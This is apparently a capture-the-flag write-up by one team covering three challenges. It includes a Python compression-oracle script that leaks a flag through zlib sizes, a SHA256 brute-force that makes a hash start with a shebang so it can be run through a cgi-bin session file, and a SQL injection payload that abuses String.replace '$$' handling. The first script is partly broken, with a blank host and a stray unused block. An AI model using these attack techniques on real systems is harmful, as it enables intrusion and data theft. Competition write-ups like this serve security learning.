It's recommended to read our responsive web version of this writeup.
We got firstblood of this challenge!
If the charater we guessed is correct, zlib compressed size will remain the same.
#!/usr/bin/env python3
import socket
import string
chars = string.ascii_uppercase + 'grn{}'
def get_zlib(res):
for l in res.decode().splitlines():
if 'zlib' in l:
return int(l.strip().rpartition(' ')[-1])
assert False
def guess_with_prefix(flag):
if len(flag) == 25:
import random
l = [i for i in range(25)]
new_l = [None for _ in range(25)]
for src, dst in enumerate(l):
new_l[dst] = flag[src]
print('guess prefix ' + repr(flag))
gz2cs = {}
for c in chars:
print('g', c)
guess = (flag + c) * 30
s.sendall(('0:' + guess + '\n').encode())
gz = get_zlib(s.recv(4096))
gz2cs[gz] = gz2cs.get(gz, '') + c
min_gz = min(gz2cs.keys())
if len(gz2cs[min_gz]) == len(chars):
print('give up prefix ' + repr(flag))
for c in gz2cs[min_gz]:
guess_with_prefix(flag + c)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
#s.connect(('', 1337))
s.connect(('', 1337))
written by bookgin, solved by ginoah
In the session file, though we can run it through /cgi-bin/session_<HEX>
, but the content is a SHA256 hash which cannot be easily controlled.
Fortunately, in order to get the flag, we just need to run ./x
. Therefore, we can brute-force the hash to make the start of the hash become shebang #!x\n
Brute-force 4 bytes in SHA256 is doable.
import hashlib
import os
import sys
import random
SALT = b"SaltyMcSaltFace"
while True:
password = str(random.randint(0, 0x100000000000000)).encode()
hash = hashlib.sha256(SALT + password).digest()
if hash.startswith(b'#!x\n'):
open('log', 'a').write(repr(password) + ':' + repr(hash[:4]) + '\n')
# 53594042019754885 - > #!x\n
Next, visit the following link to run x
and retrieve the flag.
Flag: DrgnS{valisMadeMeChangeTheFlagPfff}
written by bookgin, solved by Paul Huang, kaibro, ginoah
javascript String.replace supports some interesting feature. This bug/feature is even present in CTFd
session is aac762ef0044d46ad245622acf5c6f35. Here is the payload:
"key":"IS NULL),($$$$e2$$$$,$$$$aac762ef0044d46ad245622acf5c6f35$$$$,(select flag from flag))--",
flag is in the note of e2